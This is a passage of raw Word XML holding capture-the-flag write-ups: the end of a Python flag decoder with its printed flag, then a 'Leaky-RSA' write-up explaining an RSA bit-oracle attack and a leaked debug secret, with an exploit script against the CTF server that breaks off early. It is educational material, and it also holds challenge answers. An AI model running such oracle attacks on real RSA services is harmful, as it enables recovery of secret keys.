        <w:t>0, len(lines), 2):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01963055" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        kind0, i1, (a, b) = opts_per_line[k][0]     # i1 line uses (val1, val3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8DF9A" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        kind1, i2, (c, d) = opts_per_line[k+1][0]   # i2 line uses (val2, val4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A371607" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="1E54CBF5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        pairs[i1] = (a, c</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> i1 -&gt; (first, second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36213F6F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        pairs[i2] = (b, d</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>)  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve"> i2 -&gt; (first, second)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348B5F77" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="61DA1F69" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    # Stitch by index order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3EE6B" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    flag_bytes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E283C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    for i in range(len(pairs)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2A4377" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        first, second = pairs[i]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566AF283" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">        flag_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>bytes.extend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>([first, second])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE673F7" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="26FBA58C" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    flag = bytes(flag_bytes</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>).decode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0AA508" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    print(flag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669EE15" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2"/>
    <w:p w14:paraId="58DF9516" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146757C5" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>main(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9ECDD2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764AE666" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>python3 decoder.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3275D396" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42F722" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="00FE5FE2" w:rsidRDefault="00FE5FE2" w:rsidP="00FE5FE2">
      <w:r w:rsidRPr="00FE5FE2">
        <w:t>ictf{cu3st0m_c0mp@r@t0rs_1e8f9e}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E2FA10" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="1FA07A7F" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="0364B058" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="1CC7FBFC" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="7C154936" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2C990486" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="4CEBAEE2" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="2064ED45" w14:textId="77777777" w:rsidR="00FE5FE2" w:rsidRPr="000D4C0E" w:rsidRDefault="00FE5FE2"/>
    <w:p w14:paraId="39424AA1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:lastRenderedPageBreak/>
        <w:t>Leaky-RSA — ImaginaryCTF Write-up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35CB8B" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Challenge Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCE7129" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>We connect to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7E752" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>nc leaky-rsa.chal.imaginaryctf.org 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1FBD2" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>The server gives us:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB6889F" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>an RSA modulus n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA413BB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>an RSA ciphertext c = key_m^e mod n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095A9DA" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>an AES-CBC IV and ciphertext of the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1DD86" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Then it runs 1024 “oracle rounds.” In each round it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC228B" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">chooses a random index idx </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> {0,1,2,3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085DF34" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>asks us to submit a JSON object {"c": some_ciphertext}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD083E9" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>decrypts it to m = c^d mod n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C61806D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>replies with {"b": m[idx]} (the bit at position idx in m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338895F6" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>if our input is invalid, it returns b = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EDD955" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>At the end, the provided source code even prints out the secret key_m.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B758FC" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>The AES key is derived from the secret:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DDA3DA" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>key = sha256(str(key_m</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).encode</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>).digest()[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>:16]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E38FAE" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>The flag is AES-CBC encrypted with this key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0BC380" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="54163868">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3057F5AB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397877D0" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>The intended design: we can only see 4 low bits per query. But because RSA is multiplicatively homomorphic,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D994678" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(m1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>m2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e)≡</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(m1m</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>2)e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(modn</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>),(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>m_1^</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>m_2^e) \equiv (m_1 m_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>2)^</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e \pmod{n</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>},(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>m1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e​)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>m2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>e​)≡</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>(m1​m2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>​)e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">(modn), </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C31569D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>we can multiply the original ciphertext by 2te2^{te}2te to shift the bits of key_m into the lowest 4 positions, then query the oracle and reconstruct key_m bit by bit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD4A9E3" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> in principle, 1024 oracle rounds are enough to recover ~1024 bits of key_m.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58865609" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="737ED3D5">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F78C1" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Easy Mode (what was actually deployed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E843A7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:lastRenderedPageBreak/>
        <w:t>In the given chall.py the authors accidentally left a debug line:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7838B5" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>print(key_m)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482445D4" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> the service still prints the secret at the end!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3297BA32" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>That means we don’t even need to perform the bit-oracle attack. We just have to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CEE463" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">Reply with </w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>any valid ciphertext</w:t>
      </w:r>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> each round (to avoid b=2 errors).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C63BB" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Read key_m at the end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512AFEDC" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Derive the AES key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79802D7D" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Decrypt the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E0002" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="00000000" w:rsidP="000D4C0E">
      <w:r>
        <w:pict w14:anchorId="63917B5A">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42332046" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Exploit Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69E536" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>from pwn import remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8B22E7" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>import json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C6F367" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>from hashlib import sha256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46747715" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>from Crypto.Cipher import AES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D093119" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t>Crypto.Util.Padding</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve"> import unpad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AD8F6E" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="716458D5" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>HOST, PORT = "leaky-rsa.chal.imaginaryctf.org", 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B0D678" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>E = 65537</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6820936E" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E"/>
    <w:p w14:paraId="44C4DAFF" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t>def recv_json(io):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F124207" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
      <w:r w:rsidRPr="000D4C0E">
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7BD4C6" w14:textId="77777777" w:rsidR="000D4C0E" w:rsidRPr="000D4C0E" w:rsidRDefault="000D4C0E" w:rsidP="000D4C0E">
